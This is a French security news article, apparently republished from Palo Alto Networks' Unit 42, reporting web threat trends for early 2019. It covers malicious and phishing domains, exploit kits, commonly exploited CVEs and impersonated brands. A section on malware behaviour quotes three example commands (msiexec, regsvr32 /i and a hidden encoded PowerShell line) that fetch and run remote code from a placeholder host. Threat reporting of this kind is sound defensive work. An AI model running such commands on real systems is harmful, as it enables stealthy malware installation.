Rechercher
Contactez-nous Suivez-nous sur Twitter En francais English Language
 

De la Théorie à la pratique











Abonnez-vous gratuitement à notre NEWSLETTER

Newsletter FR

Newsletter EN

Vulnérabilités

Se désabonner

L’Unité 42 dévoile son rapport sur l’évolution des menaces Web

novembre 2019 par Unité 42 au sein de Palo Alto Networks

La Chine, les États-Unis et la Russie restent le trio de tête concernant l’hébergement de domaines frauduleux au deuxième trimestre 2019

L’Unité 42, l’équipe de chercheurs de Palo Alto Networks, a examiné les données collectées par son système ELINK (Email Link Analysis). Cet examen, qui comprend les URLs extraites des mails ou soumises via des API, leur permet d’identifier des schémas et tendance pour mieux discerner les principales menaces sur le Web. Cinquième « numéro » d’une série retraçant les menaces venues du Web à travers le temps, cette étude met en relief les statistiques en rapport avec les URLS et noms de domaines frauduleux, les kits d’exploits, les failles et les hameçonnages (ou phishing).

L’Unité 42 a remarqué une baisse notable de l’activité liée au kit Fallout durant le premier trimestre 2019 et dans la foulée note une hausse d’activité liée au kit Kaixin au second trimestre. Kaixin est principalement vu comme hébergé en Chine et, avec la popularité croissante des activités de Kaixin, les données récoltées ont montré que la Chine héberge la plus grande proportion de domaines malveillants pour la première fois depuis le début de leur collecte de données.

Les serveurs aux États-Unis restent les plus importants en volume en ce qui concerne l’hébergement des domaines de phishing, souvent déguisés en des sites Web légitimes pour obtenir des informations sensibles. Des prestataires de services connus pour des services basés dans le cloud (comme OneDrive, Office 365 et Google Drive) sont toujours les plus souvent imités par ces pages de phishing.

Les statistiques des URLs présentées dans cet article proviennent du système ELINK, un sous-système de toutes les URL couvertes par PANDB et WildFire.

URL et noms de domaine frauduleux

URL frauduleuses

Selon les données du système ELINK, l’Unité 42 a constaté une réduction drastique des URL frauduleuses au premier trimestre. Le total a baissé de 61 % par rapport au trimestre précédent. Toutefois, il y a une remontée notable au deuxième trimestre qui fait que le nombre d’URL frauduleuse est alors revenu à un niveau comparable à celui du dernier trimestre 2018. Cette baisse soudaine et temporaire est principalement due au déclin du kit d’exploit Fallout durant le premier trimestre et la montée en puissance des activités liées au kit d’exploit Kaixin au deuxième trimestre. Voici de plus amples détails dans le graphique 1 ci-dessous.

graphique 1 : URL frauduleuses du premier trimestre 2018 au deuxième trimestre 2019

Domaines frauduleux

L’Unité 42 a extrait les domaines d’hébergement des URLs frauduleuses pour suivre les tendances dans ce domaine. Elle constate un déclin de 22 % du dernier trimestre de 2018 au premier trimestre de 2019 en ce qui concerne le nombre de domaines frauduleux. Comme pour les URL frauduleuses, ce nombre de domaines a connu une hausse significative au deuxième trimestre 2019, de 90 % par rapport au trimestre précédent (voir graphique 2 ci-dessous).

graphique 2 : domaines frauduleux du premier trimestre 2018 au deuxième trimestre 2019

L’Unité 42 a également pisté la localisation géographique de ces domaines frauduleux pour en déduire où ceux-ci sont le plus souvent hébergés. Cela peut avoir un intérêt pour la classification des sites malveillants. Il n’est pas surprenant de constater que la Chine, les États-Unis et la Russie restent le trio de tête concernant l’hébergement de domaines frauduleux au deuxième trimestre 2019, comme c’est le cas depuis que l’Unité 42 a commencé la publication de ces rapports. Les États-Unis ont hébergé le plus d’URL frauduleuses jusqu’au premier trimestre 2019, mais la Chine est passée en tête au deuxième trimestre en raison de la nouvelle popularité du kit Kaixin. La Russie alterne entre la deuxième et la troisième place depuis le premier trimestre 2018. En comparaison avec ce trio, les autres pays qui hébergent des URLs et domaines frauduleux ne sont responsable que d’une petite proportion.

Graphique 3 : Évolution de la géolocalisation des domaines frauduleux du premier trimestre 2018 au deuxième trimestre 2019

Failles

Les failles les plus populaires parmi les attaquants pour des attaques venant du Web n’ont guère changé depuis 2018. L’Unité 42 constate que les failles les plus anciennes (comme CVE-2014-6332) sont peu à peu remplacées par les plus récentes (comme CVE-2018-8174). En effet, il y a moins de chance de trouver une rustine contre ces dernières sur les systèmes attaqués que contre les plus vieilles.

Graphique 4 : changement dans les principales failles utilisées du premier trimestre 2018 au deuxième trimestre 2019

Ci-dessous une présentation (en anglais) des différentes vulnérabilités qui sont, selon les constatations de l’Unité 42, fréquemment utilisées en 2019 :

CVE-2008-4844 : Use-after-free vulnerability in the CRecordInstance ::TransferToDestination function in mshtml.dll in Microsoft Internet Explorer 5.01, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via DSO bindings involving (1) an XML Island, (2) XML DSOs, or (3) Tabular Data Control (TDC) in a crafted HTML or XML document, as demonstrated by nested SPAN or MARQUEE elements, and exploited in the wild in December 2008.

CVE-2009-0075:Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka “Uninitialized Memory Corruption Vulnerability.”

CVE-2010-0806:Use-after-free vulnerability in the Peer Objects component (aka iepeers.dll) in Microsoft Internet Explorer 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via vectors involving access to an invalid pointer after the deletion of an object, as exploited in the wild in March 2010, aka “Uninitialized Memory Corruption Vulnerability.”

CVE-2012-1889:Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2014-6332:OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka “Windows OLE Automation Array Remote Code Execution Vulnerability.”

CVE-2016-0189:The MicrosoftJScript 5.8 and VBScript 5.7 and 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka “Scripting Engine Memory Corruption Vulnerability,” a different vulnerability than CVE-2016-0187.

CVE-2018-8174:A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka “Windows VBScript Engine Remote Code Execution Vulnerability.” This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

Comportements malveillants

L’Unité 42 a observé que les auteurs de malwares avaient tendance à utiliser des programmes intégrés au système (comme PowerShell, msiexec, rundll32, regsvr32, etc.) pour exécuter du code malveillant après avoir exploité une faille. Comme ces programmes sont inclus dans les systèmes ciblés, ils permettent aux attaquants d’installer et d’exécuter des malwares de façon discrète sans impliquer d’exécutables. Cette technique aide les auteurs de malwares à éviter les bacs à sable applicatifs et les systèmes d’antivirus.

Voici trois exemples de ces attaques, en anglais.
- Malware can use msiexec (Windows Installer) to install a MSI package, which can include an executable file. > msiexec /i http://[hostname]/[path1]/[path2]/wco.msi

- Malware can use “Windows Script Components” to run a script, which can execute system commands. > regsvr32 /u /s /i:http://[hostname]/1.sct scrobj.dll

Malware can use PowerShell to run an obfuscated PowerShell script. > powershell.exe -w hidden -noni -enc WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC 4ARwBlAHQAVAB5AHAAZQAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZ wBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4A…

Visites de sites malveillants

Dans les sections précédentes, l’Unité 42 a résumé le comportement des URLs qu’elle a remonté et analysé. Outre cette analyse proactive des sites Web et le blocage des URLS frauduleuses détectées, elle a également bloqué les visites vers des sites Web malveillants en se basant sur leur contenu quand leurs URL n’avaient jamais été analysées par ses services auparavant. Le graphique ci-dessous montre l’échelle des visites bloquées vers de nouveaux sites malveillants d’août 2018 à juin 2019. Par comparaison avec le dernier trimestre 2018, quand la plupart des sites Web visité et bloqué contenaient le kit d’exploit Angler, dans la première moitié de l’année 2019, l’Unité 42 a observé une diversification des kits d’exploits : Kaixin, Rig et Novidade.

Graphique 5 : nombre de visites vers des sites malveillants d’août 2018 à juin 2019

URL et domaines d’hameçonnage

URLs d’hameçonnage

Depuis que la détection du phishing a été incluse dans ELINK à la fin du troisième trimestre 2018, ELINL a détecté aux environs de 430 000 URLs récupérant les identifiants à partir de courriers électroniques et de demandes via des API. Le plus gros de ses détections s’est fait lors du dernier trimestre 2018, et l’Unité 42 a constaté un déclin au premier trimestre 2019, et un regain des détections au deuxième trimestre de cette année.

graphique 6 : Nombre d’URL d’hameçonnage détectées depuis le quatrième trimestre 2019

Domaine d’hameçonnage

Le nombre de domaines hébergeant des pages d’hameçonnage suit la même courbe que les URLs d’hameçonnage, même si l’amplitude des variations entre le dernier trimestre 2018 et le deuxième trimestre 2019 est plus faible.

Graphique 7 : les domaines d’hameçonnage depuis le dernier trimestre 2018

L’Unité 42 a également noté la localisation de ces domaines. Les États-Unis sont toujours de loin le principal pays hébergeant les domaines d’hameçonnage au deuxième trimestre 2019. Plus de 40 % de tous les domaines d’hameçonnage repérés sont hébergés dans ce pays. Les Pays-Bas arrivaient en deuxième position l’an dernier, mais l’Allemagne leur a ravi la place au deuxième trimestre, très légèrement devant la France en forte croissance. Voir le graphique 8 ci-dessous.

En comparant ces domaines à ceux hébergeant des malwares, L’Unité 42 constate que les attaquants préfèrent héberger leurs malwares en Chine ou en Russie. Les États-Unis en revanche sont les plus populaires pour le phishing avec 100 fois plus de domaines hébergés dans ce domaine qu’en Russie ou en Chine.

Graphique 8 : Distribution géographique des domaines d’hameçonnage

Cibles imitées

Pour chaque URL de phishing détectée, l’Unité 42 a identifié l’industrie qui était copiée par les pages pièges. Dans le graphique 9, elle en montre l’évolution trimestre par trimestre. Le secteur technologique (Microsoft, Apple, Google) reste le plus fréquemment copié, avec plus de 60 % des phishings. Par rapport au dernier trimestre 2018, la logistique (comme DHL) dépasse le secteur financier et bancaire et arrive en deuxième position au deuxième trimestre 2019. Le jeu vidéo (comme Battle.net) et les télécommunications (AT&T) furent moins populaires en ce début d’année, alors que l’Unité 42 constate plus de copie de Facebook ou de LinkedIn.

Graphique 9 : les industries copiées par les sites d’hameçonnage

Visite de sites d’hameçonnage

Comme pour les sites malveillants, l’Unité 42 a également étudié les nouveaux sites de phishing visités et bloqués chaque mois d’octobre 2018 à juin 2019. Les pics sont principalement dus à des utilisateurs allant voir des arnaques proposant des produits gratuits. Celles-ci représentaient 25 % de toutes les visites en mars et plus de 30 % de ces visites en juin 2019. Toutefois, d’après les analyses des URLS récoltées, ce type d’arnaque ne représente que 0,2 % des méthodes d’hameçonnage. L’une des explications serait que les utilisateurs ont tendance à plus visiter les sites leur proposant des produits gratuits que des sites imitant ceux des grands services IT, même si ces derniers sont bien plus nombreux.

Une autre découverte intéressante est qu’entre le dernier trimestre de 2018 et le deuxième trimestre de 2018, les visites de faux sites IT ont baissé passant de 25 % à 16 %. Toutefois, les visites vers les faux sites proposant des produits gratuits ont augmenté passant de 5 % à 26 % de toutes les visites, alors que, comme nous l’avons vu avec le système ELINK, le nombre d’URL y renvoyant n’a pas réellement augmenté.

Graphique 10 : nombre de visites sur des sites d’hameçonnage d’octobre 2018 à juin 2019

En conclusion

En regardant les tendances sur la première moitié de 2019, L’Unité 42 a vu une forte baisse des malwares comme des hameçonnages au premier trimestre, suivi par un regain d’activité au deuxième trimestre. Les États-Unis demeurent le principal pays d’hébergement tant pour le phishing que pour les malwares.

Le système ELINK de l’Unité 42 a encore vu des failles vieilles de 10 ans être toujours exploitées. Toutefois, la majorité des failles utilisées ont été découvertes dans les cinq dernières années. Tant WildFire que PanDB assurent une couverture complète sur l’ensemble de ces menaces.

Par rapport aux contenus malveillants, l’hameçonnage est nettement plus populaire parmi les cybercriminels. Il devient de plus en plus difficile de compromettre les navigateurs et les systèmes d’exploitation avec un logiciel ou des failles système. Face à ces difficultés, la récupération des identifiants avec des attaques par phishing est nettement plus efficace pour arriver à ses fins. Là encore, Wildfire et PanDB assurent une couverture complète.




Voir les articles précédents

    

Voir les articles suivants